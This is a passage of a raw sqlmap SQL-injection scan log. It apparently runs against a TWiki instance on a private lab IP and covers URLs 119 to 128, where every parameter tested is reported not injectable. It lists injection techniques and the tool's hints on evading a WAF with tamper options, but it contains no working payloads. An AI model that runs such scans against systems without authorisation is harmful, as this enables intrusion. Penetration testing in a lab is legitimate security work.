[19:39:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:39:28] [INFO] testing 'Oracle AND time-based blind' | |
[19:39:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:39:28] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:39:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:39:54] [WARNING] GET parameter 'topicparent' is not injectable | |
[19:39:54] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 119: | |
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic2?topicparent=Sandbox.WebHome | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:39:54] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic2?topicparent=Sandbox.WebHome' | |
[19:39:54] [INFO] testing connection to the target URL | |
[19:39:54] [INFO] testing if the target URL is stable | |
[19:39:55] [INFO] target URL is stable | |
[19:39:55] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[19:39:56] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[19:39:56] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[19:39:56] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[19:39:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:39:56] [WARNING] reflective value(s) found and filtering out | |
[19:39:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:39:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:39:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:39:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:39:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:40:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:40:00] [INFO] testing 'MySQL inline queries' | |
[19:40:00] [INFO] testing 'PostgreSQL inline queries' | |
[19:40:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:40:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:40:01] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:40:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:40:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:40:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:40:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:40:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:40:03] [INFO] testing 'Oracle AND time-based blind' | |
[19:40:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:40:04] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:40:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:40:16] [WARNING] GET parameter 'topicparent' is not injectable | |
[19:40:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 120: | |
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic3?topicparent=Sandbox.WebHome | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:40:16] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic3?topicparent=Sandbox.WebHome' | |
[19:40:16] [INFO] testing connection to the target URL | |
[19:40:16] [INFO] testing if the target URL is stable | |
[19:40:17] [INFO] target URL is stable | |
[19:40:17] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[19:40:17] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[19:40:17] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[19:40:17] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[19:40:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:40:18] [WARNING] reflective value(s) found and filtering out | |
[19:40:19] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:40:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:40:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:40:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:40:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:40:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:40:21] [INFO] testing 'MySQL inline queries' | |
[19:40:21] [INFO] testing 'PostgreSQL inline queries' | |
[19:40:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:40:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:40:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:40:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:40:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:40:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:40:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:40:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:40:25] [INFO] testing 'Oracle AND time-based blind' | |
[19:40:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:40:25] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:40:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:40:37] [WARNING] GET parameter 'topicparent' is not injectable | |
[19:40:37] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 121: | |
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic4?topicparent=Sandbox.WebHome | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:40:37] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic4?topicparent=Sandbox.WebHome' | |
[19:40:37] [INFO] testing connection to the target URL | |
[19:40:37] [INFO] testing if the target URL is stable | |
[19:40:38] [INFO] target URL is stable | |
[19:40:38] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[19:40:38] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[19:40:38] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[19:40:38] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[19:40:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:40:38] [WARNING] reflective value(s) found and filtering out | |
[19:40:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:40:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:40:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:40:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:40:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:40:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:40:41] [INFO] testing 'MySQL inline queries' | |
[19:40:42] [INFO] testing 'PostgreSQL inline queries' | |
[19:40:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:40:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:40:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:40:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:40:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:40:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:40:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:40:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:40:45] [INFO] testing 'Oracle AND time-based blind' | |
[19:40:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:40:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:41:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:41:18] [WARNING] GET parameter 'topicparent' is not injectable | |
[19:41:18] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 122: | |
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic5?topicparent=Sandbox.WebHome | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:41:18] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic5?topicparent=Sandbox.WebHome' | |
[19:41:18] [INFO] testing connection to the target URL | |
[19:41:18] [INFO] testing if the target URL is stable | |
[19:41:19] [INFO] target URL is stable | |
[19:41:19] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[19:41:19] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[19:41:19] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[19:41:19] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[19:41:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:41:19] [WARNING] reflective value(s) found and filtering out | |
[19:41:20] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:41:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:41:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:41:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:41:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:41:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:41:23] [INFO] testing 'MySQL inline queries' | |
[19:41:23] [INFO] testing 'PostgreSQL inline queries' | |
[19:41:23] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:41:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:41:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:41:24] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:41:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:41:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:41:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:41:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:41:26] [INFO] testing 'Oracle AND time-based blind' | |
[19:41:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:41:27] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:41:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:41:47] [WARNING] GET parameter 'topicparent' is not injectable | |
[19:41:47] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 123: | |
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic6?topicparent=Sandbox.WebHome | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:41:47] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic6?topicparent=Sandbox.WebHome' | |
[19:41:47] [INFO] testing connection to the target URL | |
[19:41:48] [INFO] testing if the target URL is stable | |
[19:41:49] [INFO] target URL is stable | |
[19:41:49] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[19:41:49] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[19:41:49] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[19:41:50] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[19:41:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:41:50] [WARNING] reflective value(s) found and filtering out | |
[19:41:54] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:41:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:41:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:41:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:42:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:42:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:42:03] [INFO] testing 'MySQL inline queries' | |
[19:42:04] [INFO] testing 'PostgreSQL inline queries' | |
[19:42:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:42:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:42:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:42:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:42:08] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:42:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:42:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:42:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:42:15] [INFO] testing 'Oracle AND time-based blind' | |
[19:42:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:42:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:42:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:42:27] [WARNING] GET parameter 'topicparent' is not injectable | |
[19:42:27] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 124: | |
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic7?topicparent=Sandbox.WebHome | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:42:27] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic7?topicparent=Sandbox.WebHome' | |
[19:42:27] [INFO] testing connection to the target URL | |
[19:42:27] [INFO] testing if the target URL is stable | |
[19:42:28] [INFO] target URL is stable | |
[19:42:28] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[19:42:28] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[19:42:28] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[19:42:28] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[19:42:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:42:28] [WARNING] reflective value(s) found and filtering out | |
[19:42:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:42:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:42:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:42:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:42:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:42:32] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:42:32] [INFO] testing 'MySQL inline queries' | |
[19:42:32] [INFO] testing 'PostgreSQL inline queries' | |
[19:42:32] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:42:32] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:42:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:42:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:42:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:42:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:42:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:42:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:42:35] [INFO] testing 'Oracle AND time-based blind' | |
[19:42:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:42:35] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:42:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:42:48] [WARNING] GET parameter 'topicparent' is not injectable | |
[19:42:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 125: | |
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic8?topicparent=Sandbox.WebHome | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:42:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic8?topicparent=Sandbox.WebHome' | |
[19:42:48] [INFO] testing connection to the target URL | |
[19:42:48] [INFO] testing if the target URL is stable | |
[19:42:49] [INFO] target URL is stable | |
[19:42:49] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[19:42:49] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[19:42:49] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[19:42:49] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[19:42:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:42:49] [WARNING] reflective value(s) found and filtering out | |
[19:42:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:42:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:42:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:42:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:42:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:42:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:42:52] [INFO] testing 'MySQL inline queries' | |
[19:42:52] [INFO] testing 'PostgreSQL inline queries' | |
[19:42:52] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:42:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:42:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:42:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:42:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:42:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:42:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:42:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:42:55] [INFO] testing 'Oracle AND time-based blind' | |
[19:42:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:42:56] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:43:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:43:08] [WARNING] GET parameter 'topicparent' is not injectable | |
[19:43:08] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 126: | |
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/WebHome?t=1441457353 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:43:08] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/WebHome?t=1441457353' | |
[19:43:08] [INFO] testing connection to the target URL | |
[19:43:08] [INFO] testing if the target URL is stable | |
[19:43:09] [INFO] target URL is stable | |
[19:43:09] [INFO] testing if GET parameter 't' is dynamic | |
[19:43:09] [WARNING] GET parameter 't' does not appear dynamic | |
[19:43:09] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[19:43:09] [INFO] testing for SQL injection on GET parameter 't' | |
[19:43:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:43:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:43:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:43:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:43:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:43:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:43:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:43:12] [INFO] testing 'MySQL inline queries' | |
[19:43:12] [INFO] testing 'PostgreSQL inline queries' | |
[19:43:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:43:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:43:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:43:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:43:14] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:43:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:43:15] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:43:15] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:43:16] [INFO] testing 'Oracle AND time-based blind' | |
[19:43:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:43:16] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:43:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:43:28] [WARNING] GET parameter 't' is not injectable | |
[19:43:28] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 127: | |
GET http://192.168.1.113:80/twiki/bin/search/Sandbox/SearchResult?scope=text®ex=on&search=Web *Home[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:43:28] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Sandbox/SearchResult?scope=text®ex=on&search=Web *Home[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:43:28] [INFO] testing connection to the target URL | |
[19:43:28] [INFO] testing if the target URL is stable | |
[19:43:29] [INFO] target URL is stable | |
[19:43:29] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:43:29] [WARNING] URI parameter '#1*' does not appear dynamic | |
[19:43:29] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:43:29] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:43:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:43:29] [WARNING] reflective value(s) found and filtering out | |
[19:43:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:43:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:43:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:43:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:43:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:43:33] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:43:33] [INFO] testing 'MySQL inline queries' | |
[19:43:33] [INFO] testing 'PostgreSQL inline queries' | |
[19:43:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:43:33] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:43:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:43:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:43:34] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:43:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:43:35] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:43:36] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:43:36] [INFO] testing 'Oracle AND time-based blind' | |
[19:43:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:43:37] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:43:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:43:57] [WARNING] URI parameter '#1*' is not injectable | |
[19:43:57] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 128: | |
GET http://192.168.1.113:80/twiki/bin/view/Sandbox/WebHome?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:43:57] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebHome?skin=print' | |
[19:43:57] [INFO] testing connection to the target URL | |
[19:43:57] [INFO] testing if the target URL is stable | |
[19:43:58] [INFO] target URL is stable | |
[19:43:58] [INFO] testing if GET parameter 'skin' is dynamic | |
[19:43:58] [INFO] confirming that GET parameter 'skin' is dynamic | |
[19:43:58] [INFO] GET parameter 'skin' is dynamic | |
[19:43:58] [INFO] heuristics detected web page charset 'ascii' | |
[19:43:58] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[19:43:58] [INFO] testing for SQL injection on GET parameter 'skin' | |
[19:43:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:43:58] [WARNING] reflective value(s) found and filtering out | |
[19:44:00] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:44:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:44:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:44:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:44:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:44:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:44:03] [INFO] testing 'MySQL inline queries' | |
[19:44:03] [INFO] testing 'PostgreSQL inline queries' | |
[19:44:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
